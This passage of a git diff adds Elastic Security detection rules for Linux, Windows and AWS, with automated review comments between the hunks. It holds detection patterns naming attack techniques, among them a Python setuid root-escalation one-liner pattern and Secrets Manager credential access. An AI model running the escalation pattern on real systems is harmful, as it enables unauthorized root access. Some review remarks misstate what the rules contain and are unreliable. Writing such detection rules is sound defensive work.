Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "9f9a2a82-93a8-4b1a-8778-1780895626d4_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_210.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_210.json new file mode 100644 index 00000000000..18621c0401d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_210.json 
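Review bot: The `description` of rule 9f9a2a82 says it identifies permission changes "by a non-root user", but the `query` string has no user condition at all — a `chmod`/`chown`/`chgrp`/`chattr` started in /tmp, /var/tmp or /dev/shm by root matches just like any other, so the documented scope and the detection logic disagree (the same query is repeated in the 210 hunk at L6535–L6538). Either the description should drop the non-root claim, or the query should add the filter the text implies, e.g. `not user.id:"0" and` before the `process.name` clause, with a matching `user.id` entry in `required_fields`. Separately, `process.working_directory` is declared as a `keyword` field and the query compares it to three literal paths, so the rule presumably only fires when the working directory is exactly one of those roots and not a subdirectory such as /tmp/build — worth confirming against the intended coverage and stating in the description if that is by design.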
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution.", + "false_positives": [ + "Certain programs or applications may modify files or change ownership in writable directories. These can be exempted by username." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "File Permission Modification in Writable Directory", + "new_terms_fields": [ + "host.id", + "process.parent.executable", + "process.command_line" + ], + "query": "host.os.type:linux and event.category:process and event.type:start and\nprocess.name:(chattr or chgrp or chmod or chown) and process.working_directory:(/dev/shm or /tmp or /var/tmp) and\nnot process.parent.name:(apt-key or update-motd-updates-available)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9f9a2a82-93a8-4b1a-8778-1780895626d4", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "9f9a2a82-93a8-4b1a-8778-1780895626d4_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_309.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_309.json new file mode 100644 index 00000000000..0a4510b5fbd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_309.json 
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Nick Jones", + "Elastic" + ], + "description": "An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a specific secret value from Secrets Manager using the `GetSecretValue` action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service would rely on the compromised service's IAM role to access the secrets in Secrets Manager.", + "false_positives": [ + "Verify whether the user identity, user agent, and/or hostname should be using GetSecretString API for the specified SecretId. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-60m", + "history_window_start": "now-15d", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen AWS Secret Value Accessed in Secrets Manager", + "new_terms_fields": [ + "user.id", + "aws.cloudtrail.request_parameters" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen AWS Secret Value Accessed in Secrets Manager\n\nAWS Secrets Manager is a service that enables the replacement of hardcoded credentials in code, including passwords, with an API call to Secrets Manager to retrieve the secret programmatically.\n\nThis rule looks for the retrieval of credentials using `GetSecretValue` action in Secrets Manager programmatically. 
This is a [New Terms](https://www.elastic.co/guide/en/security/master/rules-ui-create.html#create-new-terms-rule) rule indicating this is the first time a specific user identity has successfuly retrieved a specific secret value from Secrets Manager within the last 15 days.\n\n#### Possible investigation steps\n\n- Identify the account and its role in the environment, and inspect the related policy.\n- Identify the applications that should use this account.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage and historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Review IAM permission policies for the user identity and specific secrets accessed.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. 
Tuning is needed in order to have higher confidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:aws.cloudtrail and event.provider:secretsmanager.amazonaws.com and\n event.action:GetSecretValue and event.outcome:success and aws.cloudtrail.user_identity.session_context.session_issuer.type: Role and\n not user_agent.name: (\"Chrome\" or \"Firefox\" or \"Safari\" or \"Edge\" or \"Brave\" or \"Opera\")\n", + "references": [ + "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", + "https://detectioninthe.cloud/ttps/credential_access/access_secret_in_secrets_manager/", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "user_agent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a00681e3-9ed6-447c-ab2c-be648821c622", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 309 + }, + "id": "a00681e3-9ed6-447c-ab2c-be648821c622_309", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_3.json b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_3.json new file mode 100644 index 00000000000..933ca77c2ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_3.json 
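Review bot: The `false_positives` text for rule a00681e3 tells analysts to verify use of the "GetSecretString API", but the `query` matches `event.action:GetSecretValue` and the first reference link documents `API_GetSecretValue`; `GetSecretString` is not what the rule keys on, so the sentence should read `should be using the GetSecretValue API for the specified SecretId`. The investigation `note` also contains the typo `successfuly` (should be `successfully`). As a point of consistency, this rule's `setup` string is the only one in this batch without the `## Setup` heading that the 113, 210 and a0ddb77b_3 files carry, so if the heading is the convention being introduced here it is presumably missing from this rule's source as well.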
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Python cap_setuid", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.args : \"import os;os.set?id(0);os.system(*)\" and process.args : \"*python*\" and user.id != \"0\"]\n [process where host.os.type == \"linux\" and event.action in (\"uid_change\", \"gid_change\") and event.type == \"change\" and \n (user.id == \"0\" or group.id == \"0\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"a0ddb77b-0318-41f0-91e4-8c1b5528834f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "a0ddb77b-0318-41f0-91e4-8c1b5528834f_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_106.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_106.json new file mode 100644 index 00000000000..9954b8dc12c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_106.json 
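Review bot: The rule name and description attribute the escalation to the cap_setuid capability, but the `"query"` never inspects a capabilities field; the first event is recognised solely from the literal `process.args : "import os;os.set?id(0);os.system(*)"` plus `*python*`, and the second from a uid/gid change to `"0"` in the same `process.entity_id`. An analyst reading the rule cannot tell what confirms the capability, so the description should state that it is inferred, e.g. appending to `"description"` the sentence `The capability itself is not observed; the rule infers it from the argument pattern followed by a uid/gid change in the same process.` Because the argument pattern is an exact match apart from its two wildcards, the rule's scope is narrower than its title suggests, and that limitation belongs in the description as well.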
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies InstallUtil.exe making outbound network connections. This may indicate adversarial activity as InstallUtil is often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "InstallUtil Process Making Network Connections", + "query": "/* the benefit of doing this as an eql sequence vs kql is this will limit to alerting only on the first network connection */\n\nsequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"installutil.exe\"]\n [network where host.os.type == \"windows\" and process.name : \"installutil.exe\" and network.direction : (\"outgoing\", \"egress\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a13167f1-eec2-4015-9631-1fee60406dcf", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + 
"reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.004", + "name": "InstallUtil", + "reference": "https://attack.mitre.org/techniques/T1218/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "a13167f1-eec2-4015-9631-1fee60406dcf_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_108.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_108.json new file mode 100644 index 00000000000..a4bc712f7ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_108.json 
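Review bot: Unlike the sibling rules added in this commit, this rule has no `"timestamp_override": "event.ingested"` entry while its `"index"` includes `winlogbeat-*` and `logs-windows.sysmon_operational-*`; the LSASS clone rule's setup text in the same commit explains that EQL rules on beats indices depend on `event.ingested`, so the omission here is presumably an oversight. Adding `"timestamp_override": "event.ingested",` before `"type": "eql"` would make it consistent. The rule also carries no `"note"` investigation guide and no `"setup"` section, which the other endpoint rules in this commit provide; a short triage paragraph describing how to validate the connection target and the parent process would help analysts handle the first-connection alert this sequence produces.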
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Deletion via Shred", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and process.name == \"shred\" and process.args in (\n \"-u\", \"--remove\", \"-z\", \"--zero\"\n) and not process.parent.name == \"logrotate\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a1329140-8de3-4445-9f87-908fb6d824f4_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_109.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_109.json new file mode 100644 index 00000000000..f9636cb757c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_109.json 
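Review bot: The `process.args in (...)` clause accepts `-z`/`--zero` as standalone triggers, but shred's `-z` only adds a final zero-fill pass and does not unlink the file; only `-u`/`--remove` performs the deletion that the rule name `File Deletion via Shred` describes. Either drop the two zero options from the list or state in `"description"` that overwrite-only invocations are deliberately in scope, e.g. `Also matches shred runs that only overwrite with zeros (-z/--zero) without removing the file.` The same applies to the version 109 copy of this rule in the next hunk, which this commit adds alongside version 108; the two differ only in the `"setup"` heading and trailing newlines, so the fix is needed in both.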
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Deletion via Shred", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and process.name == \"shred\" and process.args in (\n \"-u\", \"--remove\", \"-z\", \"--zero\"\n) and not process.parent.name == \"logrotate\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "a1329140-8de3-4445-9f87-908fb6d824f4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_106.json 